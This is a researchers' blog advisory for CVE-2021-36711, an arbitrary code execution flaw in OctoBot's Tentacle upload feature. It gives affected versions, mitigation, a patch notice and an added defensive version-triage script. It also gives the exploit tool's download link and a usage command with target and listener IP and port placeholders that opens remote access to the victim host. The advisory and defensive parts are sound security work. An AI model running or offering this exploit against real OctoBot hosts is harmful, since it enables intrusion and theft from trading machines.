[CVE-2021-36711] Sashimi Evil OctoBot Tentacle

Sashimi Evil OctoBot Tentacle is a Python script that exploits a vulnerability in the Tentacles upload functionality of OctoBot, a cryptocurrency trading bot designed to be easy to use and customizable. This open source trading bot has the particularity of offering its users the possibility to upload their own trading algorithms.

Sashimi Evil OctoBot Tentacle takes advantage of this feature to upload a maliciously crafted package that leads to arbitrary code execution.

Affected versions

All OctoBot versions up to the latest version (0.4.0b12) are vulnerable. However, this exploit will only work from version 0.4.0b3 until version 0.4.1.

Proof of concept

(PoC Tested on Octobot 0.4.0b10)

Funny, isn't it?

More in-depth tutorial video by @CodeMaru:

Requirements

  • Python 3 (you must already have it if you are an OctoBot user :D)
  • An OctoBot target host platform.

As usual, the 3 scripts presented are open source and available on GitHub at the following address:

python3 sashimi.py --RHOST TARGET_IP --RPORT TARGET_PORT --LHOST YOUR_IP --LPORT YOUR_OPEN_PORT

Be patient for around 3 minutes, the time it takes to download, create and upload the malicious Tentacle package, and you should have remote access to the machine. That's it!

Mitigation

To protect against this attack, set a password on your OctoBot platform or add an .htpasswd file in front of its web interface.

[Update] A new version, 0.4.4, that fixes the vulnerability has been released.

https://github.com/Drakkar-Software/OctoBot/issues/1966
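For anyone triaging a fleet of bots against this advisory, here is a small version check that encodes the ranges stated above (affected until 0.4.4, public PoC applicable from 0.4.0b3 up to, but not including, 0.4.1). It is an added example written for this page, not code from the OctoBot project or from the Sashimi tool, and it assumes OctoBot version strings follow the `0.4.0b10` form used in this article.

```python
import re
from typing import Tuple

# Version bounds as stated in the advisory text above (assumption: taken from the
# article, not confirmed against the OctoBot changelog).
EXPLOIT_MIN = "0.4.0b3"   # earliest version the published PoC targets
EXPLOIT_MAX = "0.4.1"     # PoC is stated to stop working from this version on
FIXED_IN = "0.4.4"        # release that closes the vulnerability

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:(a|b|rc)(\d+))?$")
_PRE_RANK = {"a": 0, "b": 1, "rc": 2}
_FINAL_RANK = 3  # a final release sorts after any pre-release of the same base


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn '0.4.0b10' into a sortable tuple (major, minor, patch, pre_rank, pre_num)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised OctoBot version string: {text!r}")
    major, minor, patch, tag, num = m.groups()
    rank = _PRE_RANK[tag] if tag else _FINAL_RANK
    return (int(major), int(minor), int(patch), rank, int(num) if num else 0)


def is_vulnerable(version: str) -> bool:
    """True when the deployed version predates the fixing release."""
    return parse_version(version) < parse_version(FIXED_IN)


def poc_applies(version: str) -> bool:
    """True when the version falls in the range the published PoC is stated to work on."""
    v = parse_version(version)
    return parse_version(EXPLOIT_MIN) <= v < parse_version(EXPLOIT_MAX)


def triage(version: str) -> str:
    """One-line status for an inventory entry."""
    if not is_vulnerable(version):
        return "patched"
    if poc_applies(version):
        return "vulnerable (public PoC applies)"
    return "vulnerable (upgrade required)"


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    for host, ver in [("bot-a", "0.4.0b10"), ("bot-b", "0.4.2"), ("bot-c", "0.4.4")]:
        print(f"{host}: {ver} -> {triage(ver)}")
```

Any host reported as vulnerable should be upgraded to 0.4.4 or later and, until then, have its web interface protected as described in the mitigation above.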

Note

FOR EDUCATIONAL PURPOSES ONLY.

Reference

https://nvd.nist.gov/vuln/detail/CVE-2021-36711

Download

https://gitlab.com/0xSamy/Sashimi-Evil-OctoBot-Tentacle

Thanks for reading this article! I hope you learned something through our research! If you liked what you read, please share and follow us on Twitter at @NeroTeamLabs

Security researchers